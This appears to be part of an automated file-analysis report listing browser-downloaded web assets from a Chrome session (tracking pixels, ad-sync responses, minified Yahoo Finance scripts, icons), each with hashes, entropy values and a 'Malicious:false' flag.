                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................d............................................P...........................!1..AQa."2q..B..#3R...$b....Sr..CVd......4DTUc.....................................0........................!1...AQ..#BR"2aq3Cb...............?........U...P.At......B.B....PXPCR..XP.@........6.jy...'......i:....MU..I]i.z..lw.7....&3.s......k.r,.pm..{...Z.,..,..u...B.R4.*...(...P.@....JAA.P.4.....(...P.(&..... ..X..l...F..........(........(....(. N(,]...P.@._.......hV.....R..Q..p..u.$...y....Y-i.......oUu...d..pu..v{..A8.v.....Z~._.T...J...z.p5......E .JF..!....P.(....M\.$.&.P1;..@.n....@.."....PPPgW!A"h.p"...d.b.../( (......(.....At.....(1..(6.....r.j..$.e..7.q....Sn.a..;>.@./J......?i....p...#..N..4-.J....I?.._M......|.GqO.z...6..].....(....JBh2..N.Z..._..P.t...P.@.....P.y..(..8...:.l...(........(......(.T...N..P.......`....|k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.142069457963608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU1urkltxlHh/:gg/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DB04C7B378CB2DB912C3BA8A5A774EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DEE34BD86C3484D31002182AA2B7CAA4699126B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:98B3D9D20E032F90ACA49E9B116225D539FF6FBDB7E42C3C363F63896AC03D2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:826225FC21717D8861A05B9D2F959539AAD2D2B131B2AFED75D88FBCA535E1B0D5A0DA8AC69713A0876A0D467848A37A0A7F926AEAFAD8CF28201382D16466AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ipac.ctnsnet.com/int/cm?exc=14&redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM0MTEmdGw9MjAxNjA=&piggybackCookie=[user_id]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.141224508910417
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:DdTCIsqDmJS4RKb5ykKcvXjXRHoNcHxIjIRuAdSewD:D59mc4sl3O4UKxO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:79FF1942D2AC137CC43949E74FB9284E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:53B152950469C4BC8EA242A534D5EBACB21F408D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5B558A0B664276A90837F96BC3A66228318C68A502ACB89C6680EB01C90C06DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:012D33A667E72C9754DA88FCDE3DE3446B056BD44F88C1036481613DEF632D513EE000675C464CEBAEDE8A4060FED3F171B68BE22369A50BA725A02D24F9E6D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/add.J4mq2Ck6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6z"/></svg>';export{v as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072991&val=CAESEK_r5jpEZOAAsG4pffHlrH8&google_cver=1&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.287620079105892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:C/2A3njBlJQ3i+3QUpAwHpD:C/nXjBlJ9qBH5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:823A52E1BE75431CF150D322C1914A08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8F465D010763F456735DE11BE04E0334D55BB0F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B68D3BCC50134A13694876F3E923AB30AFDD042157927BF564EBF5BAFE90D178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:047875E49851F9387D4E6EDA4CFB9ADAA0DF6ABBACC61B39EA081DA533BB665B8A935F544F0209257FE758B77F7D2979B220E4284949BF286A9CA6D75A47288F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://gum.criteo.com/sync?r=2&c=321&gdpr=0&gdpr_pd=0&gdpr_consent=&us_privacy=1YNN&j=window.advBidxc.mnetRtusId
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.advBidxc.mnetRtusId({"status":"OK","userid":"CpFiwo3q3M1vYyQEMgY42UXwWGO13rfE"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (11817)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):194049
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.440856819785206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:RVh44joUY5rBmx3CPPY36akg1CGCnF+oUUA6mtDI63LAVJwveNL3kxu8u3c+u3zU:R5Co1CGCnFJSAD3kxu8u3c50wfqKkVv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:44772CDBCFC537ABE50E5783EF74A295
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C04DE7C231AAE937155120FD200CB0E2D75207F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:347680616F1D9E49F18E71B2F294137F226C46AAE18782E94AAD47AB887ABA5F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:456908C66D884770BE93AB84E66108393D18A5BB548C6DEC47DAC4985864D4693C2252B7F56B2E179AA739C2ED0BEB0950F635386EEF7300CA59BED26CD64B43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/sadbundle/4341621869189295830/index.html?e=69&leftOffset=0&topOffset=0&c=Ks6S6nNc0n&t=1&renderingType=2&ev=01_252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html><head><meta name="GCD" content="YTk3ODQ3ZWZhN2I4NzZmMzBkNTEwYjJl2bb21b1f75c6a082bcf43a9e53086bd1" />. <style>gwd-page{display:block}.gwd-inactive{visibility:hidden}</style>. <style>gwd-image.scaled-proportionally>div.intermediate-element>img{background-repeat:no-repeat;background-position:center}gwd-image{display:inline-block}gwd-image>div.intermediate-element{width:100%;height:100%;transform-style:unset}gwd-image>div.intermediate-element>img{display:block;width:100%;height:100%}</style>. <style>.gwd-pagedeck{position:relative;display:block}.gwd-pagedeck>.gwd-page.transparent{opacity:0}.gwd-pagedeck>.gwd-page{position:absolute;top:0;left:0;-webkit-transition-property:-webkit-transform,opacity;-moz-transition-property:transform,opacity;transition-property:transform,opacity}.gwd-pagedeck>.gwd-page.linear{transition-timing-function:linear}.gwd-pagedeck>.gwd-page.ease-in{transition-timing-function:ease-in}.gwd-pagedeck>.gwd-page.ease-out{transition-timing-function:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.089898095464287
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YEOBHt1hU9/omkNkSKf4n:YEOBRU9gZy4n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FCBA184F01D9B5F149BF487A6349DAB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:00E52514F15099211A42052DC623D8B24A4D2431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D0EB8EB911A43148FBF47A7D5F9760D160D255CA456823CA8A860B89C58B52CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5D09E6AA20A9026140300F3558623592410D0CD7D866FA0EC9B92F98564F55347E74B6F2AA01D07D5A0834777DEC8F77AFD37487B93AB73AE1E97666AC39ADEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"axid": "eS1pQmgwX2JaRTJ1RlFaREx0MTNqSnNzTlhSLnByMEhoWX5B"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.html?p=gumgum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):88659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376886315450943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:/OOLe6LIozqg76MmhSDTHUgO/fNl03RElUWw+RbtKDEMc:06pzZ6MQcilCRElUyRbtKDE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CB03350D0C32631BB2F75A6C7B4164C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6F02439778F69F4708C536DF330CBD662DA8BD9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:464967B10A3ED261A39CD6C8EB252AE90A41B68B8EA9074656F0F0906CEDB91B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:25FA5576B14AEF6EE9E7D0AAAE9573A22AD548CF6B8DA339E58D8D7F87EE1DEE88511520976B5DCC4691919CD8F66C282BB303A7E0CE364EFC946A263E667B9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/benji/benji-2.1.133.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=ttd&uid=ec697e3a-059d-498c-affa-95beeaabd2a9&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/v000/sync?pn_id=c&google_gid=CAESED8c54xk5D0XNBQdhuTCCoA&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.265878255802692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qR7ggbGbzbLcp1UaVOK2Ld0hOs9VdkqBO:zgyXfA1UaVOKg0/+Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:393B8510A2B7FD64966F4DC587DB7E8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EC0CE39B06836ACD63B949AB280DCF1E31F22E01
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF8D5D15F5AF0F04A3ADE0049986ED4124212BF7CF92CA3DBF5779C652CC5673
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AB3D739CDFB37CD3927EBB361F8F2CBC1AC38FA2B8D0DF3431EC3EAF78E65D11986856B8BB623F7392F70366011CE1AEB98EAED73AF2A0DBFF6DCD94199AAA1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as S,j as b,d as A,k as N,E as _,l as L}from"./commonUtil.CI22_Irn.js";import{f as O,l as h}from"./logUtil.hOue7iAU.js";import{l as q}from"./loadQuote.D9BAmXuK.js";const T={add:{perfLabel:"addPositions",operandName:"symbol",operationToPerform:"position_insert"},delete:{perfLabel:"deletePositions",operandName:"posId",operationToPerform:"position_delete"},reorder:{perfLabel:"reorderPositions",operandName:"posId",operationToPerform:"position_update"}};function D(e,t,i){const{action:o}=e,{operandName:d,operationToPerform:a}=T[o];let s=!1;if(o==="add"){const{insertAtEnd:n=!1}=e;s=n}return t.map((n,r)=>({operation:a,[d]:n,...o!=="delete"&&{sortOrder:s?i+r:r}}))}const F=e=>e?Array.isArray(e)?e:e.split(","):null;async function B(e,t){var y,P,I;const i=await S(e);if(!b(i)||!((y=i.user)!=null&&y.guid))return null;const{pfId:o,silent:d=!1,action:a}=t,[s]=await A(["portfolio"],e),n=i.user.guid,r=a==="add",{perfLabel:f}=T[a],l=r?F(t.symbols):t.posIds;if(!o||!l||!l.length)return null;let c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1010
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.753846191195984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:B53TwWHFN2eceUFa4zVO8pw9oroZhETpVbDs/Qf97:r8WNa5pyorWhETcoV7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0FB70690288109F594A3EE773A489890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0063896E70219950943A66B781DB9D3799702FB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8FC174251647F28D51D31F696603BCBAE579788915AC49818F93B1EF695F5853
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4B37EBF118D32FB1193365836ACF307907777B736E73795B3CC292A13E148F0476A840FBE02F98067E354C7408A2275B0C18B8C1552C71143A0AD185EC9632BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/20947.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.=o.1.......?..l..V.F.{...$.1...T),.#.....,t..ta:...;........}}.......&._.O.G.M5.k.w9C..:...1..U....-.<_/.L.{.hi...].c.L..8a...#...+....&7i.....r.T?.I{.!.-B5.?;N.OU_..N.K..:I..}f.Yl.7O.^..Y}h.t..S..+.>...f..<H...y.Y..6.!a.....N.P..X..3..p.z-..D=x......e.-.......|i..u/`.......2.D...{..%=C....1.o.........L...^..s.~.s...9...b.p4m..aN#9.d.H.*^...R....._>.,......s....s.,:..`.K....R-6.\.L..JRbyl..2.E...`.O".<..V9.qU.!...0.......,U.x.......G....<.h....M....4E.. ..X......\......K.......sB.H..".`r......]a...v[.s.......f...'P..s....(W....=..r.....o .k.......%G I.gS;....0O[.'0.....Lj.....q..OUl7(5;.N.&..&V...*..8<.I.......S%..J...>g.T.w...*ows.!n....9"g....%.@K..5..sd.3....7..m...u/`b..R/Y...u/.....K;.r.1an...]...r..'7.8.......<~.......;..$nx..E.Wl5.h.<NWY..6....n(.....R........$....E.........:.*...+..{..3..D.]W..7O*.'.%.=.-I...!o...q.....u.W.t...oi....Xa......<_oQ?...|..7..B.1.y..s.-8..?..RV....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.722171450366903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSx/FRuv24RFJR2u+JCII+JWRnMeK+D:OE2c12dCII+JWnfKO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ED8A91B22F9D7E324FEC51213C83DD6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F6F110EA47068F7CE14172CF4D82963C78E3D2FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4C51B01CFFBB8E6B49A9E0632D89DD406983979C81C4C1F397472D03E87DF60
